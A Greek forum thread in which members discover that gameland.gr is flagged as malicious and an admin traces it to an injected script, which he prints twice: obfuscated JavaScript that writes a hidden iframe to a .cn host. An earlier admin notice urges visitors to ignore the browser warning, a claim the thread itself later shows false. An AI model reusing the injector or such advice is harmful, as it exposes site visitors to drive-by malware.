E?????(το ειδαμε κι αυτο)
Δημοσιεύτηκε: 09 Ιουν 2009 03:42
Σελίδα 1 από 2
Δημοσιεύτηκε: 09 Ιουν 2009 10:03
Τα avatars του Geoanas και Whacker την έκαναν την ζημιά τα έκανα upload στο mame.gr οπότε bo prob 
...τώρα γιατι το gameland.gr θεωρείται κακό.... ???
...τώρα γιατι το gameland.gr θεωρείται κακό.... ???
Δημοσιεύτηκε: 09 Ιουν 2009 10:23
Εκτός του ότι ο Chrome χτύπησε και σε μένα στο gameland, παράλληλα το avast μου δίνει αναφορά για trojan στο site!!!!!!!!!!!
GEOANAAAAAAAAAAASSSSSSSSSSSSSS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
GEOANAAAAAAAAAAASSSSSSSSSSSSSS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Δημοσιεύτηκε: 09 Ιουν 2009 10:47
Πριν λίγο είχα μπει κι εγώ στο Gamelad και είδα παρόμοιο μήνυμα.
Θέλει έλεγχο ο κώδικας, κάτι έχει αντιγραφεί.
Θέλει έλεγχο ο κώδικας, κάτι έχει αντιγραφεί.
Δημοσιεύτηκε: 09 Ιουν 2009 11:31
Και εγώ που μπαίνω με την τελευταία έκδοση του Firefox (3.0.10) μου βγάζει αυτό :
Δημοσιεύτηκε: 09 Ιουν 2009 13:52
Να πάρει μας πιάσατε.......
ΕΙΜΑΣΤΕ ΚΑΚΟΙ ΟΛΕ ! ΟΛΕ !
Για να είμαι ειλικρινής κι εγώ έχω παρόμοιο πρόβλημα με την gameland και το site μου...
WHACKER !!! HELP !!!
ΕΙΜΑΣΤΕ ΚΑΚΟΙ ΟΛΕ ! ΟΛΕ !
Για να είμαι ειλικρινής κι εγώ έχω παρόμοιο πρόβλημα με την gameland και το site μου...
WHACKER !!! HELP !!!
Δημοσιεύτηκε: 10 Ιουν 2009 01:16
Ε, ναι λοιπόν, αποκαλύφθηκαν όλα.
Ο Whacker είναι ο μεγαλύτερος αρχι-spammer, διανεμητής malware, ιών κλπ. Να συλληφθεί πάραυτα και να καταδικαστεί σε δέκα χρόνια καταναγκαστικά έργα.
Σοβαρά τώρα, τον πήρα τηλέφωνο και είναι όλο τσαντίλα γιατί έχει επικοινωνήσει εδώ και μέρες με το Google για να διορθωθεί το λάθος και μέχρι στιγμής τον αγνοούν.
Προς το παρόν, δηλώνει τα εξής στην Gameland:
Ο Whacker είναι ο μεγαλύτερος αρχι-spammer, διανεμητής malware, ιών κλπ. Να συλληφθεί πάραυτα και να καταδικαστεί σε δέκα χρόνια καταναγκαστικά έργα.
Σοβαρά τώρα, τον πήρα τηλέφωνο και είναι όλο τσαντίλα γιατί έχει επικοινωνήσει εδώ και μέρες με το Google για να διορθωθεί το λάθος και μέχρι στιγμής τον αγνοούν.
Προς το παρόν, δηλώνει τα εξής στην Gameland:
Gameland became a threat!
09/06/2009 20:06 Filed in: General
Google has decided that this site contains malicious software that installs without the user consent. I have to say two things:
A. Why on earth you people are not more specific about the threats you found? (ie: page ‘x’ contains malicious code, please remove it)
B. Why after reviewing a host-master’s message about false posting don’t act within a couple of days, or week (at least respond to the message!)
To all of the visitors here; I am sure most of you know why you’re here. This site has never distributed any malware, virus, cracks, drugs, pills, women, booze, crapware or whatever the google’s advisor might have thought it did. Just press ‘ignore this warning’ and get inside. I assure you; it’s as safe as ever. Of course you can choose otherwise and trust Google.
It’s fine! really!
Whacker
Δημοσιεύτηκε: 10 Ιουν 2009 16:43
Δηλώνω ένοχος... (καμία απάντηση από το γούγλη). Απαράδεκτη συμπεριφορά. 
Δημοσιεύτηκε: 10 Ιουν 2009 18:45
Μετά τον Ambu,η σειρά σου για ban....
Πρόεδρε,τα γνωστα παρακαλώ....
Πρόεδρε,τα γνωστα παρακαλώ....
Δημοσιεύτηκε: 10 Ιουν 2009 22:14
Ένα μένει λοιπόν :
να ενωθούν οι αρχιχάκερ του φόρουμ και να κάνουμε το ίδιο στο google, όποιος μπαίνει στο Google να του λέει ότι είναι site με malicious code κτλ (το είχαν πάθει από λάθος τους πρόσφατα
)
Έλα οι παλαίουρες να πιάνουν δουλειά.....
να ενωθούν οι αρχιχάκερ του φόρουμ και να κάνουμε το ίδιο στο google, όποιος μπαίνει στο Google να του λέει ότι είναι site με malicious code κτλ (το είχαν πάθει από λάθος τους πρόσφατα
)Έλα οι παλαίουρες να πιάνουν δουλειά.....
Δημοσιεύτηκε: 11 Ιουν 2009 23:35
Πάντως πριν λίγους μήνες είχα παρόμοιο πρόβλημα στο GreekRoms. Μου έλεγε κάποιος ότι του χτυπάει το Kaspersky όταν πάει να μπει στο site. Δεν μπορεί, λέω, μπούρδες του Kaspersky.
Κι όμως, στην αρχική σελίδα είχε προστεθεί μια γραμμή κώδικα η οποία άνοιγε pop-up κάποιο ρωσικό site που είχε κακό σκοπό τελοσπάντων.
Δεν έχω ιδέα πώς στο καλό μπορεί να έγινε αυτό ούτε για πόσο καιρό ήταν έτσι μέχρι να το αλλάξω, γιατί πάντα έμπαινα απευθείας στην επόμενη σελίδα και όχι σ'αυτή με το intro που είχε και το πρόβλημα.
Το λέω αυτό απλά για να ελέγξετε πολύ προσεκτικά τον κώδικα στις σελίδες του gameland μήπως παίζει τίποτα παρόμοιο και εκεί.
Κι όμως, στην αρχική σελίδα είχε προστεθεί μια γραμμή κώδικα η οποία άνοιγε pop-up κάποιο ρωσικό site που είχε κακό σκοπό τελοσπάντων.
Δεν έχω ιδέα πώς στο καλό μπορεί να έγινε αυτό ούτε για πόσο καιρό ήταν έτσι μέχρι να το αλλάξω, γιατί πάντα έμπαινα απευθείας στην επόμενη σελίδα και όχι σ'αυτή με το intro που είχε και το πρόβλημα.
Το λέω αυτό απλά για να ελέγξετε πολύ προσεκτικά τον κώδικα στις σελίδες του gameland μήπως παίζει τίποτα παρόμοιο και εκεί.
Δημοσιεύτηκε: 12 Ιουν 2009 01:43
Ισχύει Giama. Από το πρωί σβήνω scripts του τύπου:
από σχεδόν οποιαδήποτε html σελίδα υπήρχε στο site.
Αυτό αφορά και τα δικά σου html Geoanas, οπότε πριν από οποιοδήποτε update, κατεβάζεις αυτό που έχω καθαρίσει από το site και κάνεις edit + repost.
Το πρόβλημα εντοπίζεται αρκετό καιρό πίσω (πάνω από 1,5 χρόνο) που η gameland πέρασε σε νέο server (όλο το site έγινε mirror από τον παλιό στον καινούργιο) γιατί ο παλιός είχε "issues" σύμφωνα με τον ιδιοκτήτη. Το ζήτημα είναι πως ήρθε κληροδότημα το εν λόγω script σε κάθε html που υπήρχε εντός χωρίς κανείς να το ζητήσει...
Ένα άλλο ζήτημα είναι πως και δεν χτύπησε κανένα από τα a/v που τρέχω στο γραφείο / σπίτι / laptop κλπ. Τέλος πάντων.
Bottom line: Αθώος ο Γούγλης, παρ' ότι έχω παράπονα για το response. Έχουμε καταντήσει να μας μιλάνε, να μας ελέγχουν και να μας βρίσκουν τα προβλήματα bots! WTF δηλαδή!
Και ένα βιντεάκι για να ευθυμήσουμε λίγο:
http://www.youtube.com/watch?v=9H8tGE4mr_0
Κώδικας: Επιλογή όλων
<script>document.write(unescape('%u003c%u0069%u0066%u0072
%u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022
%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0063%u0075
%u0074%u0061%u0069%u0061%u006d%u006f%u0072%u0074%u0067
%u0061%u0067%u0065%u0067%u0072%u006f%u0075%u0070%u002e
%u0063%u006e%u002f%u0066%u006c%u002f%u0069%u006e%u0064
%u0065%u0078%u002e%u0070%u0068%u0070%u0022%u0020%u0077
%u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065
%u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074
%u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069
%u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068
%u0069%u0064%u0064%u0065%u006e%u0022%u003e%u003c%u002f
%u0069%u0066%u0072%u0061%u006d%u0065%u003e'));</script>Αυτό αφορά και τα δικά σου html Geoanas, οπότε πριν από οποιοδήποτε update, κατεβάζεις αυτό που έχω καθαρίσει από το site και κάνεις edit + repost.
Το πρόβλημα εντοπίζεται αρκετό καιρό πίσω (πάνω από 1,5 χρόνο) που η gameland πέρασε σε νέο server (όλο το site έγινε mirror από τον παλιό στον καινούργιο) γιατί ο παλιός είχε "issues" σύμφωνα με τον ιδιοκτήτη. Το ζήτημα είναι πως ήρθε κληροδότημα το εν λόγω script σε κάθε html που υπήρχε εντός χωρίς κανείς να το ζητήσει...
Ένα άλλο ζήτημα είναι πως και δεν χτύπησε κανένα από τα a/v που τρέχω στο γραφείο / σπίτι / laptop κλπ. Τέλος πάντων.
Bottom line: Αθώος ο Γούγλης, παρ' ότι έχω παράπονα για το response. Έχουμε καταντήσει να μας μιλάνε, να μας ελέγχουν και να μας βρίσκουν τα προβλήματα bots! WTF δηλαδή!
Και ένα βιντεάκι για να ευθυμήσουμε λίγο:
http://www.youtube.com/watch?v=9H8tGE4mr_0
Δημοσιεύτηκε: 12 Ιουν 2009 07:38
Το βιντεάκι είναι όλα τα λεφτά !!
Whacker να 'σαι καλά για τον κόπο σου. Θα ψαχτώ αρκετά πριν από κάθε update....κι έχω πολύ καιρό να κάνω
Whacker να 'σαι καλά για τον κόπο σου. Θα ψαχτώ αρκετά πριν από κάθε update....κι έχω πολύ καιρό να κάνω
Δημοσιεύτηκε: 12 Ιουν 2009 12:20
Μπράβο, τέτοιο στυλ ήταν και η έξτρα γραμμή στο GreekRoms.Whacker έγραψε:Ισχύει Giama. Από το πρωί σβήνω scripts του τύπου:από σχεδόν οποιαδήποτε html σελίδα υπήρχε στο site.Κώδικας: Επιλογή όλων
<script>document.write(unescape('%u003c%u0069%u0066%u0072 %u0061%u006d%u0065%u0020%u0073%u0072%u0063%u003d%u0022 %u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0063%u0075 %u0074%u0061%u0069%u0061%u006d%u006f%u0072%u0074%u0067 %u0061%u0067%u0065%u0067%u0072%u006f%u0075%u0070%u002e %u0063%u006e%u002f%u0066%u006c%u002f%u0069%u006e%u0064 %u0065%u0078%u002e%u0070%u0068%u0070%u0022%u0020%u0077 %u0069%u0064%u0074%u0068%u003d%u0031%u0020%u0068%u0065 %u0069%u0067%u0068%u0074%u003d%u0031%u0020%u0073%u0074 %u0079%u006c%u0065%u003d%u0022%u0076%u0069%u0073%u0069 %u0062%u0069%u006c%u0069%u0074%u0079%u003a%u0020%u0068 %u0069%u0064%u0064%u0065%u006e%u0022%u003e%u003c%u002f %u0069%u0066%u0072%u0061%u006d%u0065%u003e'));</script>
Θέλει έλεγχο κάθε τόσο λοιπόν, αλλά ακόμα δεν έχω καταλάβει πώς μπορεί να έγινε.
Και επίσης το ΝΟD32 δεν διαμαρτυρήθηκε ποτέ (έχει δικαιολογίες βέβαια: ότι έχω ενημερωμένη μεν αλλά παλιά σχετικά έκδοση, καθώς επίσης και ότι μπαίνω απευθείας στις παραμέσα σελίδες και όχι στην αρχική. Κάποια φορά θα είχε τύχει φαντάζομαι να μπω και στην αρχική.) Τεσπα.
Δημοσιεύτηκε: 12 Ιουν 2009 20:45
Βασικά τα antivirus νομίζω ότι δεν "χτυπάνε" γιατί αυτό το script είναι βασικά ένα link για να κατεβάσει "κάτι" (προφανώς κακόβουλο) από κάποιο site. Προφανώς τα antivirus το βλέπουν σαν κοινό link και δεν ξέρω καν αν υπάρχει τρόπος να το αναγνωρίσουν χωρίς να χτυπάνε και false positives.
Πάντως ούτε το AVG (πλήρως ενημερωμένο) το αναγνωρίζει (κατέβασα "μολυσμένο" html του Geoanas και το έκανα scan τοπικά).
Και όντως μπορείς να έχεις πρόσβαση σε "ενδότερες" σελίδες στο site χωρίς να χτυπήσει alarm στο Firefox. Νομίζω ότι αυτό είναι λάθος του τρόπου που γίνεται το blacklisting. Πχ αν προσπαθήσεις να κατεβάσεις το http://www.gameland.gr/files/dc.rar (μην φοβάστε CMPro datfiles για DC GDI είναι...) το Firefox ξεκινάει το download τελείως ατάραχο.
Πάντως ούτε το AVG (πλήρως ενημερωμένο) το αναγνωρίζει (κατέβασα "μολυσμένο" html του Geoanas και το έκανα scan τοπικά).
Και όντως μπορείς να έχεις πρόσβαση σε "ενδότερες" σελίδες στο site χωρίς να χτυπήσει alarm στο Firefox. Νομίζω ότι αυτό είναι λάθος του τρόπου που γίνεται το blacklisting. Πχ αν προσπαθήσεις να κατεβάσεις το http://www.gameland.gr/files/dc.rar (μην φοβάστε CMPro datfiles για DC GDI είναι...) το Firefox ξεκινάει το download τελείως ατάραχο.